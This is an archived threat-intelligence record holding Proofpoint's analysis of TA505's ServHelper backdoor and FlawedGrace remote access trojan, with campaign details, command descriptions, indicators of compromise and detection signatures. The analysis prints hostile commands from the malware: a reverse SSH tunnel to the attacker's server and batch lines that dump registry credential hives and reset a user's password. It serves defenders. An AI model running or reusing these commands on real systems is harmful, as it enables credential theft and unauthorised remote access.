{
	"id": "e1cec180-f869-408b-81c4-668e090696aa",
	"created_at": "2026-04-06T00:09:46.359693Z",
	"updated_at": "2026-04-10T03:36:36.859082Z",
	"deleted_at": null,
	"sha1_hash": "225db53760733b893a9375cae18576cb22e501b4",
	"title": "ServHelper \u0026 FlawedGrace: New TA505 Malware | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2550435,
	"plain_text": "ServHelper \u0026 FlawedGrace: New TA505 Malware | Proofpoint US\r\nBy Dennis Schwarz and Proofpoint Staff, January 09, 2019\r\nPublished: 2019-01-09 · Archived: 2026-04-05 14:40:42 UTC\r\nOverview\r\nFor much of 2018, we observed threat actors increasingly distributing downloaders, backdoors, information\r\nstealers, remote access Trojans (RATs), and more as they abandoned ransomware as their primary payload. In\r\nNovember 2018, TA505, a prolific actor that has been at the forefront of this trend, began distributing a new\r\nbackdoor we named “ServHelper”. ServHelper has two variants: one focused on remote desktop functions and a\r\nsecond that primarily functions as a downloader. Additionally, we have observed the downloader variant download\r\na malware we call “FlawedGrace.” FlawedGrace is a full-featured RAT that we first observed in November 2017.\r\nTA505 appears to be actively targeting banks, retail businesses, and restaurants as they distribute these malware\r\nfamilies. This targeting falls in line with other activity we reported earlier in 2018.[1] [2]\r\nCampaign Analysis\r\nNovember 9 “Tunnel” Campaign\r\nOn November 9, 2018, we observed a relatively small email campaign (thousands of messages) delivering a new\r\nmalware family that we call “ServHelper” based on file names associated with infection. The campaign primarily\r\ntargeted financial institutions and was attributed to the threat actor TA505. 
The messages (Figure 1) contained\r\nMicrosoft Word or Publisher attachments with macros that, when enabled, downloaded and executed the malware.\r\nThis campaign used the “tunnel” variant of ServHelper, described in the “Malware Analysis” section.\r\nFigure 1: Example email message from the November 9 “tunnel” campaign\r\nNovember 15 “Downloader” Campaign\r\nhttps://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\nPage 1 of 17\n\nOn November 15, 2018, we saw a similar, but larger campaign (tens of thousands of messages) from the same\r\nactor. In addition to financial institutions, this campaign also targeted the retail industry. The messages (Figure 2)\r\ncontained Microsoft “.doc”, “.pub”, or “.wiz” attachments. The documents contained macros that, when enabled,\r\ndownloaded and executed the ServHelper malware. This campaign used the “downloader” variant of ServHelper\r\nwith the tunneling functionality removed.\r\nFigure 2: Example email message from the November 15 “downloader” campaign\r\nDecember 13 “FlawedGrace” Campaign\r\nOn December 13, 2018, we observed another large ServHelper “downloader” campaign targeting retail and\r\nfinancial services customers. 
The messages used a mixture of Microsoft Word attachments with embedded\r\nmalicious macros, PDF attachments with URLs linking to a fake “Adobe PDF Plugin” webpage linking to the\r\nmalware (Figure 3), and direct URLs in the email body linking to a ServHelper executable.\r\nFigure 3: Example PDF attachment containing a URL linking to the fake “Adobe PDF Plugin” page\r\nIn this campaign, we observed ServHelper download (Figure 4) and execute an additional malware that we call\r\n“FlawedGrace.” FlawedGrace is a robust remote access trojan (RAT) that we initially encountered in November\r\n2017, but have rarely observed since.\r\nFigure 4: Fiddler screenshot showing ServHelper downloading FlawedGrace\r\nServHelper Malware Analysis\r\nServHelper is a new malware family -- best classified as a backdoor -- that we first observed in the wild in\r\nNovember 2018. Its name is based on a filename (ServHelper.dll) that we noted in the November 9 “tunnel”\r\ncampaign described above. A sample from a later campaign used command and control (C\u0026C) URIs containing\r\n“/rest/serv.php” which also reference a “serv” component.\r\nThe malware is written in Delphi and at the time of this writing is being actively developed. New commands and\r\nfunctionality are being added to the malware in almost every new campaign so we will not focus on one specific\r\nsample for this analysis. Rather, we will discuss the malware family generally; see the “Indicators of\r\nCompromise” section below for specific reference samples.\r\nAs noted, there are two distinct variants of ServHelper: a “tunnel” variant and a “downloader” variant. 
The\r\n“tunnel” variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to\r\naccess the infected host via Remote Desktop Protocol (RDP). Once ServHelper establishes remote desktop access,\r\nthe malware contains functionality for the threat actor to “hijack” legitimate user accounts or their web browser\r\nprofiles and use them as they see fit. The “downloader” variant is stripped of the tunneling and hijacking\r\nfunctionality and is used as a basic downloader.\r\nBoth variants of ServHelper use the same HTTP C\u0026C protocol on port 443 (HTTPS) and, less frequently, port 80\r\n(HTTP). An example of the initial phone home to the C\u0026C server is shown in Figure 5.\r\nFigure 5: Example of ServHelper’s initial phone home\r\nEarly versions of the malware used a semi-random URI such as: “/ghuae/huadh.php”. Newer versions have started\r\nusing more typical URIs such as:\r\n/support/form.php\r\n/rest/serv.php\r\n/sav/s.php\r\nMost of the C\u0026C domains that we have observed have been in the “.pw” top-level domain (TLD) such as:\r\nchecksolutions[.]pw\r\nafgdhjkrm[.]pw\r\npointsoft[.]pw\r\ndedoshop[.]pw\r\nHowever, recently the developer has added support for “.bit” C\u0026C domains; this TLD is associated with the\r\ncryptocurrency Namecoin and requires special DNS servers that the malware uses:\r\ndedsolutions[.]bit\r\narepos[.]bit\r\nThe POST data in these C\u0026C communications contains three URL-encoded parameters: “key”, “sysid”, and\r\n“resp”. The “key” parameter is a hardcoded string in the malware that does not appear to be used elsewhere in the\r\ncode. 
Examples of observed keys include:\r\nGsiss744@sd\r\nasdgdgYss455\r\n#567sisGdsa\r\nThe “sysid” parameter contains a campaign ID in newer versions of the malware, the Windows version running on\r\nthe infected machine, system architecture, username, and a random integer. Examples of observed campaign IDs\r\ninclude:\r\nclean12\r\nchistka12.17\r\nnoP_19\r\nnonRDP\r\nno24\r\nny_upd\r\nThe “resp” parameter contains responses to commands received from the controller.\r\nAn example command sent from the C\u0026C server to the infected machine can be seen in the Fiddler screenshot in\r\nFigure 4 above. It contains a command, a caret (“^”) delimiter, and command arguments. We observed the\r\nfollowing commands in the malware:\r\nnop\r\nImplements a keep-alive type of functionality. The infected machine responds to the C\u0026C server with a “nop ok”\r\nmessage.\r\ntun (“tunnel” variant only)\r\nSets up a reverse SSH tunnel connecting the C\u0026C server to the infected system’s RDP port (3389). In earlier\r\nversions, a loader component performed the initial setup for this and other commands by:\r\nExtracting and dropping an OpenSSH binary from its PE resources\r\nExtracting, dropping, and configuring the RDP Wrapper Library software from its PE resources\r\nCreating a new user “supportaccount” with a password of “Ghar4f5”\r\nAdding this user to the “Remote Desktop Users” and “Administrators” groups\r\nIn more recent versions, this functionality of the loader component was integrated into the core ServHelper code,\r\nusing built-in Windows remote desktop support instead of a third-party software package. 
This command sets up a\r\nreverse SSH tunnel by executing the dropped OpenSSH binary with the following command line arguments:\r\n-N -R \u003cremote port\u003e:localhost:3389 tunnel@\u003cC\u0026C server\u003e\r\nOnce configured, ServHelper sends a “tun ok\\r\\nport:\u003cremote port\u003e tun pid:\u003cSSH process id\u003e” to the C\u0026C\r\nserver.\r\nslp\r\nSets a sleep timeout.\r\nfox (“tunnel” variant only)\r\nCopies a Firefox web browser profile from one user to another. Earlier versions used the Windows “xcopy”\r\ncommand. Later versions download a self-extracting RAR file from the C\u0026C server (/cp/cp.exe) and decompress\r\nit using the password “123”. One of the files in this archive is a piece of software known as \"Runtime's Shadow\r\nCopy\" and it is used to copy the web browser profiles.\r\nchrome (“tunnel” variant only)\r\nSimilar to the “fox” command but for Chrome web browser profiles.\r\nkilltun (“tunnel” variant only)\r\nKills an SSH tunnel process associated with a particular remote port. Once killed, it sends a “killtun ok” message\r\nto the C\u0026C server.\r\ntunlist (“tunnel” variant only)\r\nGets a list of all active SSH tunnels and responds to the C\u0026C server with a message containing “active tun:\r\n\u003cremote port\u003e” entries for each active tunnel.\r\nkillalltuns (“tunnel” variant only)\r\nKills all SSH tunnel processes.\r\nshell\r\nExecutes a shell command and sends the response to the C\u0026C server.\r\nload\r\nDownloads and runs an executable from a specified URL. 
Responds to the C\u0026C server with either “load no param\r\nok” or “load param ok” depending on whether any command-line arguments were passed to the downloaded executable.\r\nsocks (“tunnel” variant only)\r\nSimilar to the “tun” command, but allows a reverse SSH tunnel to be built between the C\u0026C server and any\r\nserver/port (as specified by the command argument) through the infected system. Once configured, a “socks\r\nok\\r\\nport:\u003cremote port\u003e tun pid:\u003cSSH process id\u003e” message is sent to the C\u0026C server.\r\nselfkill\r\nRemoves the malware from the infected machine.\r\nloaddll (“downloader” variant only)\r\nA newer command that has only been observed in the “downloader” variant. Similar to the “load” command, but\r\nfor DLLs.\r\nbk (“tunnel” variant only)\r\nA newer command similar to the “tun” command. “bk” allows the reverse SSH tunnel to be set up using a C\u0026C-\r\nspecified remote host instead of the hardcoded C\u0026C server.\r\nhijack (“tunnel” variant only)\r\nA newer command that appears to hijack a user account with a known password (“123”). It does so by creating\r\nand scheduling a task “test” to run a batch file containing the following commands:\r\nreg export hklm\\sam c:\\sam.reg\r\nreg export hklm\\security c:\\sec.reg\r\nnet user \u003ccommand argument username\u003e 123\r\nIt then schedules a task “test2” to run another batch file containing the following commands:\r\nschtasks /delete /tn \"test\" /F\r\nreg import c:\\sam.reg\r\nreg import c:\\sec.reg\r\nschtasks /delete /tn \"test2\" /F\r\nFinally, it runs the first scheduled task and sends a “ready! try to login with pass 123” message to the C\u0026C server.\r\nforcekill (“tunnel” variant only)\r\nA newer command that is similar to the “killalltuns” command but uses the Windows “taskkill” command.\r\nsethijack (“tunnel” variant only)\r\nA newer command that controls an “alerting” mechanism. A separate program thread monitors user logons. 
When\r\na legitimate user becomes active and the threat actor is connected to the infected system using the previously\r\ncreated “supportaccount” account, it runs the “chrome” and “fox” commands, copying the legitimate user’s web\r\nbrowser profiles to the “supportaccount” user. It then alerts the threat actor by sending message boxes containing\r\n“login detected, begin hijacking” and “profiles hijacked!” messages. These are sent by a “msg.exe” program\r\ncontained in the “cp.exe” archive discussed in the “fox” command above.\r\nchromeport (“tunnel” variant only)\r\nA newer command that implements the same functionality as the “chrome” command.\r\nDuring some of the ServHelper “downloader” campaigns, we observed commands (e.g., as shown in Figure 4\r\nabove) instructing the malware to download and execute another malware we call “FlawedGrace”.\r\nFlawedGrace Malware Analysis\r\nFlawedGrace is a remote access trojan (RAT) named after debugging artifacts (class names) left in the analyzed\r\nsample (see Figure 6).\r\nFigure 6: “Grace” class names shown by IDA Pro\r\nThe malware is written in C++. It is a very large program and makes extensive use of object-oriented and\r\nmultithreaded programming techniques. This makes reverse engineering and debugging the malware both difficult\r\nand time consuming. The coding style and techniques suggest that FlawedGrace was not written by the same\r\ndeveloper as ServHelper.\r\nWe initially observed FlawedGrace in an email campaign as early as November 2017, but until the recent\r\nServHelper campaigns, we had not observed it being actively distributed again. 
The malware usually contains a\r\ndebug string including a “version number” and “build date” distinct from the PE compile timestamp, allowing\r\nsearches of various malware repositories to find additional versions:\r\nUnknown version number built at “Aug  7 2017 22:28:47”\r\nVersion 2.0.7 built at “Oct 18 2017 04:18:39”\r\nVersion 2.0.8 built at “Oct 26 2017 12:05:44”\r\nVersion 2.0.9 built at “Nov  4 2017 22:28:10”\r\nVersion 2.0.10 built at “Nov 20 2017 10:53:33”\r\nVersion 2.0.11 built at “Dec 16 2017 08:02:46”\r\nPer the malware’s debug strings, significant development took place during the end of 2017. The ServHelper\r\ncampaigns were distributing version 2.0.10 of the malware.\r\nFlawedGrace creates, encrypts, and stores a configuration file containing the C\u0026C IPs and ports in a “\u003chex\r\ndigits\u003e.dat” file (e.g., “C:\\ProgramData\\21851a60.dat”). The first 16 bytes of the file are an AES initialization\r\nvector (IV). The rest of the data is AES-encrypted in CBC mode. In the analyzed sample, the AES key was\r\nhardcoded as “c3oeCSIfx0J6UtcV”. Once decrypted, the configuration data is stored as a custom serialization\r\n(Figure 7). Early versions of the malware used the class names “GraceParams” and “GraceValue” when\r\ninteracting with this part of the code, so it is likely that the serialization was designed and developed by the\r\nmalware developer and not a standard format.\r\nFigure 7: Plaintext configuration file showing C\u0026C IP and port\r\nFlawedGrace uses a complicated binary protocol for its command and control. It can use a configurable port for\r\ncommunications, but all samples we have observed to date have used port 443. 
Figure 8 shows an example of the\r\nfirst four messages between an infected system and C\u0026C server.\r\nFigure 8: FlawedGrace’s initial C\u0026C communications.\r\nWe are still reverse engineering and documenting the protocol, but we can provide an overview of the initial C\u0026C\r\ncommunications below:\r\nMessage 1\r\nInitial beacon from infected system. It is a 14-byte binary structure that contains at least the following parts:\r\nOffset 0x0: CRC32 hash of remaining data (DWORD)\r\nOffset 0x4: magic bytes \"GCRG\" (DWORD)\r\nMessage 2\r\nKey verification message from infected system. We believe that this is used to verify that one of the encryption\r\nkeys (static key) is the same on both the malware and C\u0026C server. It is a 52-byte binary structure that contains the\r\nfollowing analyzed offsets, among other components still under analysis:\r\nOffset 0x0: CRC32 hash of remaining data (DWORD)\r\nOffset 0x14: MD5 hash of the following pieces (16 bytes)\r\nA static key which has always been “static pass” in the samples analyzed\r\nThe random bytes at offset 0x24 that have been hex encoded and uppercased\r\nOffset 0x24: random bytes (16 bytes)\r\nMessage 3\r\nKey exchange message from C\u0026C server. This message delivers a second encryption key (dynamic key) used for\r\nfurther data transfers. It is a 42-byte structure that contains the following analyzed offsets, among other\r\ncomponents still under analysis:\r\nOffset 0x0: CRC32 hash of remaining data (DWORD)\r\nOffset 0x1a: dynamic key (16 bytes)\r\nMessage 4\r\nAn example of data transfer between infected system and C\u0026C server. 
It starts with a 38-byte binary header that\r\ncontains the following analyzed offsets, among other components still under analysis:\r\nOffset 0x0: CRC32 hash of the next 10 bytes (DWORD)\r\nOffset 0xE: AES IV (16 bytes)\r\nFollowing the header is the data that has been AES-encrypted in CBC mode. The AES key is generated using the\r\n“static key” and the “dynamic key” from messages 3 and 4 above. An example of key generation in Python\r\nappears in Figure 9.\r\nFigure 9: Example FlawedGrace C\u0026C data transfer encryption key generation in Python\r\nFigure 10 shows an example of the plaintext data transferred in message 4.\r\nFigure 10: Example FlawedGrace C\u0026C message 4 plaintext data\r\nThis message contains various system and malware information that has been serialized using the same method as\r\nfor configuration files. The serialized data is then packaged within additional binary data structures.\r\nWhile there are other message types with their own formats, the examples here provide initial insight into\r\nFlawedGrace’s C\u0026C protocol.\r\nFlawedGrace also uses a series of commands, provided below for reference:\r\ntarget_remove\r\ntarget_update\r\ntarget_reboot\r\ntarget_module_load\r\ntarget_module_load_external\r\ntarget_module_unload\r\ntarget_download\r\ntarget_upload\r\ntarget_rdp\r\ntarget_passwords\r\ntarget_servers\r\ntarget_script\r\ndestroy_os\r\ndesktop_stat\r\nConclusion\r\nThreat actor TA505 is both consistent and prolific. When the group distributes new malware, it may be a blip (like\r\nBart ransomware, which was only distributed for one day in 2016) or like Locky ransomware it may become the\r\ndominant strain of malware in the wild. 
In this case, the group has started distributing two variants of a new\r\nbackdoor we named ServHelper and a RAT we call FlawedGrace. This also extends the trend that emerged in\r\n2018, in which threat actors increasingly focused on distribution of downloaders, information stealers, RATs, and\r\nother malware that can remain resident on victim devices for far longer than destructive, “smash and grab”\r\nmalware like ransomware. We will continue to observe the distribution of these three malware variants but, at this\r\ntime, they do not appear to be one-offs, but rather long-term investments by TA505.\r\nReferences\r\n[1] https://www.proofpoint.com/us/threat-insight/post/ta505-targets-us-retail-industry-personalized-attachments\r\n[2] https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware\r\nIndicators of Compromise (IOCs)\r\nIOC | Type | Description\r\n52c72a9de2f6e892f07827add85ad913b0541cd5c8449aadc2722f8eb75e548c | SHA256 | November 9 “Tunnel” campaign attachment\r\nhxxp://officemysuppbox[.]com/staterepository | URL | November 9 “Tunnel” campaign payload\r\n1b0859ddbdebcb9d2bb46de00d73aa21bc617614b8123054426556783b211bc8 | SHA256 | November 9 “Tunnel” campaign ServHelper\r\nhxxps://checksolutions[.]pw/ghuae/huadh.php | URL | November 9 “Tunnel” campaign ServHelper C\u0026C\r\nhxxps://rgoianrdfa[.]pw/ghuae/huadh.php | URL | November 9 “Tunnel” campaign ServHelper C\u0026C\r\nhxxps://arhidsfderm[.]pw/ghuae/huadh.php | URL | November 9 “Tunnel” campaign ServHelper C\u0026C\r\neb66ebb95a3dcecae64c61f611a9332fbf460d1b8039d3ab7e4f220104a4bec4 | SHA256 | November 15 “Downloader” campaign attachment\r\nhxxp://offficebox[.]com/host32 | URL | November 15 “Downloader” campaign payload\r\n3cd7e0a8321259e8446b2a9da775aae674715c74ff4923cfc8ec5102f380d41a | SHA256 | November 15 “Downloader” campaign ServHelper\r\nf4b9219f329803dd45afd5646351de456e608dd946830c961ec66c6c25e52cac | SHA256 | December 13 “FlawedGrace” campaign attachment\r\nhxxp://office365onlinehome[.]com/host32 | URL | December 13 “FlawedGrace” campaign payload\r\nd56429d6d0222022fe8f4cb35a28cd4fb83f87b666a186eb54d9785f01bb4b58 | SHA256 | December 13 “FlawedGrace” campaign ServHelper\r\nhxxps://afgdhjkrm[.]pw/aggdst/Hasrt.php | URL | December 13 “FlawedGrace” campaign ServHelper C\u0026C\r\nefcee275d23b6e71589452b1cb3095ff92b10ab68cd07957b2ad6be587647b74 | SHA256 | December 13 “FlawedGrace” campaign FlawedGrace\r\n46.161.27[.]241:443 | IP:Port | December 13 “FlawedGrace” campaign FlawedGrace C\u0026C\r\n9fccd107bd0aee3a2f39ad76a49758309c95545d8154b808eec24d2b51dc4579 | SHA256 | “sethijack” command ServHelper\r\nhxxp://dedsolutions[.]bit/sav/s.php | URL | “sethijack” command ServHelper C\u0026C\r\nhxxp://dedoshop[.]pw/sav/s.php | URL | “sethijack” command ServHelper C\u0026C\r\nhxxp://asgaage[.]pw/sav/s.php | URL | “sethijack” command ServHelper C\u0026C\r\nhxxp://sghee[.]pw/sav/s.php | URL | “sethijack” command ServHelper C\u0026C\r\na9492312f1258567c3633ed077990fe053776cd576aa60ac7589c6bd7829d549 | SHA256 | “loaddll” command ServHelper\r\nhxxps://vesecase[.]com/support/form.php | URL | “loaddll” command ServHelper C\u0026C\r\nET and ETPRO Suricata/Snort Signatures\r\n2833522 ETPRO TROJAN Observed Malicious SSL Cert (HuadhServHelper RAT CnC)\r\n2833552 ETPRO TROJAN HuadhServHelper RAT CnC Domain Observed in SNI\r\n2833881 ETPRO TROJAN Observed Malicious SSL Cert (ServHelper CnC)\r\n2833985 ETPRO TROJAN Observed Malicious SSL Cert (ServHelper CnC)\r\n2834074 ETPRO TROJAN Observed Malicious SSL Cert (ServHelper CnC)\r\n2834233 ETPRO TROJAN ServHelper CnC Inital Checkin\r\n2828489 ETPRO TROJAN FlawedGrace CnC Activity\r\nSource: https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505"
	],
	"report_names": [
		"servhelper-and-flawedgrace-new-malware-introduced-ta505"
	],
	"threat_actors": [
		{
			"id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59",
			"created_at": "2024-06-19T02:03:08.128175Z",
			"updated_at": "2026-04-10T02:00:03.636663Z",
			"deleted_at": null,
			"main_name": "GOLD TAHOE",
			"aliases": [
				"Cl0P Group Identity",
				"FIN11 ",
				"GRACEFUL SPIDER ",
				"SectorJ04 ",
				"Spandex Tempest ",
				"TA505 "
			],
			"source_name": "Secureworks:GOLD TAHOE",
			"tools": [
				"Clop",
				"Cobalt Strike",
				"FlawedAmmy",
				"Get2",
				"GraceWire",
				"Malichus",
				"SDBbot",
				"ServHelper",
				"TrueBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4",
			"created_at": "2022-10-25T15:50:23.5188Z",
			"updated_at": "2026-04-10T02:00:05.26565Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"TA505",
				"Hive0065",
				"Spandex Tempest",
				"CHIMBORAZO"
			],
			"source_name": "MITRE:TA505",
			"tools": [
				"AdFind",
				"Azorult",
				"FlawedAmmyy",
				"Mimikatz",
				"Dridex",
				"TrickBot",
				"Get2",
				"FlawedGrace",
				"Cobalt Strike",
				"ServHelper",
				"Amadey",
				"SDBbot",
				"PowerSploit"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3",
			"created_at": "2023-01-06T13:46:38.860754Z",
			"updated_at": "2026-04-10T02:00:03.125179Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"SectorJ04",
				"SectorJ04 Group",
				"ATK103",
				"GRACEFUL SPIDER",
				"GOLD TAHOE",
				"Dudear",
				"G0092",
				"Hive0065",
				"CHIMBORAZO",
				"Spandex Tempest"
			],
			"source_name": "MISPGALAXY:TA505",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e447d393-c259-46e2-9932-19be2ba67149",
			"created_at": "2022-10-25T16:07:24.28282Z",
			"updated_at": "2026-04-10T02:00:04.921616Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"ATK 103",
				"Chimborazo",
				"G0092",
				"Gold Evergreen",
				"Gold Tahoe",
				"Graceful Spider",
				"Hive0065",
				"Operation Tovar",
				"Operation Trident Breach",
				"SectorJ04",
				"Spandex Tempest",
				"TA505",
				"TEMP.Warlock"
			],
			"source_name": "ETDA:TA505",
			"tools": [
				"Amadey",
				"AmmyyRAT",
				"AndroMut",
				"Azer",
				"Bart",
				"Bugat v5",
				"CryptFile2",
				"CryptoLocker",
				"CryptoMix",
				"CryptoShield",
				"Dridex",
				"Dudear",
				"EmailStealer",
				"FRIENDSPEAK",
				"Fake Globe",
				"Fareit",
				"FlawedAmmyy",
				"FlawedGrace",
				"FlowerPippi",
				"GOZ",
				"GameOver Zeus",
				"GazGolder",
				"Gelup",
				"Get2",
				"GetandGo",
				"GlobeImposter",
				"Gorhax",
				"GraceWire",
				"Gussdoor",
				"Jaff",
				"Kasidet",
				"Kegotip",
				"Kneber",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Locky",
				"MINEBRIDGE",
				"MINEBRIDGE RAT",
				"MirrorBlast",
				"Neutrino Bot",
				"Neutrino Exploit Kit",
				"P2P Zeus",
				"Peer-to-Peer Zeus",
				"Philadelphia",
				"Philadephia Ransom",
				"Pony Loader",
				"Rakhni",
				"ReflectiveGnome",
				"Remote Manipulator System",
				"RockLoader",
				"RuRAT",
				"SDBbot",
				"ServHelper",
				"Shifu",
				"Siplog",
				"TeslaGun",
				"TiniMet",
				"TinyMet",
				"Trojan.Zbot",
				"Wsnpoem",
				"Zbot",
				"Zeta",
				"ZeuS",
				"Zeus"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434186,
	"ts_updated_at": 1775792196,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/225db53760733b893a9375cae18576cb22e501b4.pdf",
		"text": "https://archive.orkl.eu/225db53760733b893a9375cae18576cb22e501b4.txt",
		"img": "https://archive.orkl.eu/225db53760733b893a9375cae18576cb22e501b4.jpg"
	}
}